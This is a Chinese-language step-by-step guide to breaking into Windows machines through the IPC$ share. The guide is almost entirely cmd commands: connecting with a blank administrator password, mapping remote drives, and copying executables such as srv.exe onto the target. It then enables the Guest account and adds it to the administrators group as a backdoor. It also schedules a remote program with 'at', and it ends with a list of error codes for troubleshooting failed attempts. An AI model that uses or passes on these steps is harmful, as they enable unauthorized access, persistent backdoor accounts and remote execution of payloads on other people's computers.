前提條件

啟動服務

首先保證目標的IPC服務啟動，服務為lanmanWorkstation，顯示名為Workstations

端口

telnet目標計算機lanmanWorkstation服務的兩個端口，即139和445

telnet ip 139

telnet ip 445

啟動目標IPC共享

這些要寫成shell腳本copy到目標計算機下執行

net share ipc$

關閉

net share ipc$ /del

步驟

建立ipc$連接

net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格)

net use \\222.222.221.102\ipc$ "" /user:"administrator"

刪除一個ipc$連接

net use \\IP\ipc$ /del

映射遠程共享:

net use z: \\IP\Disk$

net use z: \\222.222.221.102\d$

刪除共享映射

net use z: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認

查看遠程主機的共享資源（但看不到默認共享）
net view \\IP

向遠程主機復制文件
copy \路徑\srv.exe \\IP\共享目錄名，如：
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內

查看用戶名

net user

查看帳戶的屬性

net user 帳戶名

添加以後登錄賬號(目標主機重啟後可用)

激活Guest用戶

net user guest /active:yes

修改Guest密碼

net user guest 123456

Guest變為Administrator

net localgroup administrators guest /add

遠程添加計劃任務
at \\ip 時間 程序名，如：
at \\127.0.0.0 11:00 love.exe

失敗原因

1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445端口(惑被防火墻屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
根據返回的錯誤號分析原因：
錯誤號5，拒絕訪問 ： 很可能你使用的用戶不是管理員權限的，先提升權限；
錯誤號51，Windows 無法找到網絡路徑 : 網絡有問題；
錯誤號53，找不到網絡路徑 ： ip地址錯誤；目標未開機；目標lanmanserver服務未啟動；目標有防火墻（端口過濾）；

錯誤號67，找不到網絡名 ： 你的lanmanworkstation服務未啟動；目標刪除了ipc$；
錯誤號1219，提供的憑據與已存在的憑據集沖突 ： 你已經和對方建立了一個ipc$，請刪除再連。
錯誤號1326，未知的用戶名或錯誤密碼 ： 原因很明顯了；
錯誤號1327，用戶賬戶限制阻止了此用戶進行登錄；
錯誤號1792，試圖登錄，但是網絡登錄服務沒有啟動 ： 目標NetLogon服務未啟動。（連接域控會出現此情況）
錯誤號2242，此用戶的密碼已經過期 ： 目標有帳號策略，強制定期要求更改密碼。

cmd net use